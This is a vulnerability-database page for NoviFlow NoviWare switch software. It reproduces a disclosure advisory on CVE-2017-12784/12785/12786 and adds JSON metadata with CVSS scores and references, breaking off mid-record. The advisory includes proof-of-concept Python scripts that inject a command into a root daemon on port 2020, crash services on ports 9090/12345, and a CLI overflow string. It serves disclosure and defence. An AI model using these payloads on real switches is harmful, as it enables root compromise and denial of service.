12 vulnerabilities found for noviware by noviflow

VAR-201708-1145

Vulnerability from variot - Updated: 2025-04-20 23:04

The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS).

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

Introduction

NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.

CVEs

  • CVE-2017-12784: remote code execution in novi_process_manager_daemon. Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

  • CVE-2017-12785: CLI breakout in novish. Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)

  • CVE-2017-12786: remote code execution in noviengine and cliengine. Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Affected versions

NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed

Author

François Goichon - Google Security Team

CVE-2017-12784

Remote code execution in novi_process_manager_daemon

Summary

The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device.

  • A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service.
  • This network service is prone to command injection and a stack-based buffer overflow.

Reproduction

If TCP port 2020 is accepting connections from the network, the following Python script can be used to ping yourself on vulnerable versions:


---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, 2020))

payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)

s.close()
---

On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

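CVE-2017-12785

CLI breakout in novish

Summary

The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.

Reproduction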

Log in to the appliance via SSH and run the following command from the CLI:

noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --

If the appliance is vulnerable, the CLI crashes and the session ends.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12786

Remote code execution in noviengine and cliengine

Summary

  • A flaw when applying ACL changes requested from the CLI could expose the noviengine and cliengine network services.
  • These network services are prone to a stack-based buffer overflow when unpacking serialized values.

Reproduction

If TCP ports 9090 or 12345 are accepting connections from the network, the following Python script can be used to cause a crash on vulnerable versions:


---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))

payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)

s.read(1)
s.close()
---


A watchdog should restart the service if it has crashed.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

Disclosure timeline

2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1145",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "noviflow",
        "version": "400.2.6"
      },
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "noviflow",
        "version": "nw400.2.6"
      },
      {
        "model": "noviware",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "noviflow",
        "version": "400.2.6"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:noviflow:noviware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Francois Goichon",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "143818"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-12785",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2017-12785",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2017-12785",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-12785",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2017-12785",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201708-459",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-12785",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlow NoviWare \u003c= NW400.2.6 multiple vulnerabilities\n\n\nIntroduction\n==========\nNoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant\nswitch software developed by NoviFlow and available for license to\nnetwork equipment manufacturers. \nMultiple vulnerabilities were identified in the NoviWare software\ndeployed on NoviSwitch devices. \n\n\nCVEs\n=====\n* CVE-2017-12784: remote code execution in novi_process_manager_daemon\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n* CVE-2017-12785: cli breakout in novish\nIndicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)\n\n* CVE-2017-12786: remote code execution in noviengine and cliengine\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n\nAffected versions\n==============\nNoviWare \u003c= NW400.2.6 and devices where a vulnerable NoviWare version\nis deployed\n\n\nAuthor\n======\nFranASSois Goichon - Google Security Team\n\n\nCVE-2017-12784\n==============\nRemote code execution in novi_process_manager_daemon\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to two distinct\nbugs which could potentially allow a remote, unauthenticated attacker\nto gain privileged (root) code execution on the switch device. 
\n- A flaw when applying ACL changes requested from the CLI could expose\nthe novi_process_manager_daemon network service\n- This network service is prone to command injection and a stack-based\nbuffer overflow\n\nReproduction\n------------------\nIf TCP port 2020 is accepting connections from the network, the\nfollowing python script can be used to ping yourself on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, 2020))\n\npayload = pack(\"\u003cI\", 0xffffffff).ljust(0x24) + \"ping \u003cyour ip\u003e; echo\\x00\"\ns.sendall(pack(\"\u003cII\", 1, len(payload)+8))\ns.sendall(payload)\n\ns.close()\n---\n\nOn vulnerable versions, the appliance will perform an ICMP request to\nthe specified IP, which can be observed in network logs. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\nReproduction\n------------------\nLog in to the appliance via SSH and run the following command from the CLI:\n--\nnoviswitch# show log cli username\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n--\n\nIf the appliance is vulnerable, the cli crashes and the session ends. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. 
\n- A flaw when applying ACL changes requested from the CLI could expose\nnoviengine and cliengine network services\n- These network services are prone to a stack-based buffer overflow\nwhen unpacking serialized values. \n\nReproduction\n------------------\nIf TCP ports 9090 or 12345 are accepting connections from the network,\nthe following python script can be used to cause a crash on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, \u003c9090 or 12345\u003e))\n\npayload = \"\".join([pack(\"\u003cI\", 4) + \"AAAA\" for i in xrange(408)])\npayload = pack(\"\u003cIIQ\", 0, len(payload) + 16, 0) + payload\ns.sendall(payload)\n\ns.read(1)\ns.close()\n---\n\nA watchdog should restart the service if it has crashed. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nDisclosure timeline\n===============\n2017/05/11 - Report sent to NoviFlow\n2017/05/26 - Bugs acknowledged and remediation timeline confirmed\n2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities\n2017/08/09 - CVE requests\n2017/08/16 - Public disclosure\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      }
    ],
    "trust": 1.8
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42518",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-12785",
        "trust": 2.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "42518",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12785",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143818",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "id": "VAR-201708-1145",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.32692307
  },
  "last_update_date": "2025-04-20T23:04:26.327000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NoviWare",
        "trust": 0.8,
        "url": "https://noviflow.com/products/noviware/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://www.exploit-db.com/exploits/42518/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12785"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12785"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12786"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "date": "2017-08-18T23:44:44",
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "date": "2017-08-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "date": "2017-08-22T17:29:00.193000",
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12785"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      },
      {
        "date": "2017-08-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      },
      {
        "date": "2025-04-20T01:37:25.860000",
        "db": "NVD",
        "id": "CVE-2017-12785"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NoviWare Buffer error vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007313"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-459"
      }
    ],
    "trust": 0.6
  }
}

VAR-201708-1147

Vulnerability from variot - Updated: 2025-04-20 23:04

A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). NoviFlow NoviWare and NoviSwitch devices are products of NoviFlow Canada. NoviSwitch devices are a series of switch devices; NoviWare is the switch software used in them. NoviFlow NoviWare NW400.2.6 and previous versions and NoviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges.

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

Introduction

NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.

CVEs

  • CVE-2017-12784: remote code execution in novi_process_manager_daemon. Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

  • CVE-2017-12785: CLI breakout in novish. Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)

  • CVE-2017-12786: remote code execution in noviengine and cliengine. Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Affected versions

NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed

Author

François Goichon - Google Security Team

CVE-2017-12784

Remote code execution in novi_process_manager_daemon

Summary

The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device.

  • A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service.
  • This network service is prone to command injection and a stack-based buffer overflow.

Reproduction

If TCP port 2020 is accepting connections from the network, the following Python script can be used to ping yourself on vulnerable versions:


---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, 2020))

payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)

s.close()
---

On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12785

CLI breakout in novish

Summary

The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.

Reproduction

Log in to the appliance via SSH and run the following command from the CLI:

noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --

If the appliance is vulnerable, the CLI crashes and the session ends.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12786

Remote code execution in noviengine and cliengine

Summary

  • A flaw when applying ACL changes requested from the CLI could expose the noviengine and cliengine network services.
  • These network services are prone to a stack-based buffer overflow when unpacking serialized values.

Reproduction

If TCP ports 9090 or 12345 are accepting connections from the network, the following Python script can be used to cause a crash on vulnerable versions:


---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))

payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)

s.read(1)
s.close()
---


A watchdog should restart the service if it has crashed.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

Disclosure timeline

2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1147",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "noviflow",
        "version": "400.2.6"
      },
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "noviflow",
        "version": "nw400.2.6"
      },
      {
        "model": "noviware \u003c=nw400.2.6",
        "scope": null,
        "trust": 0.6,
        "vendor": "noviflow",
        "version": null
      },
      {
        "model": "noviware",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "noviflow",
        "version": "400.2.6"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
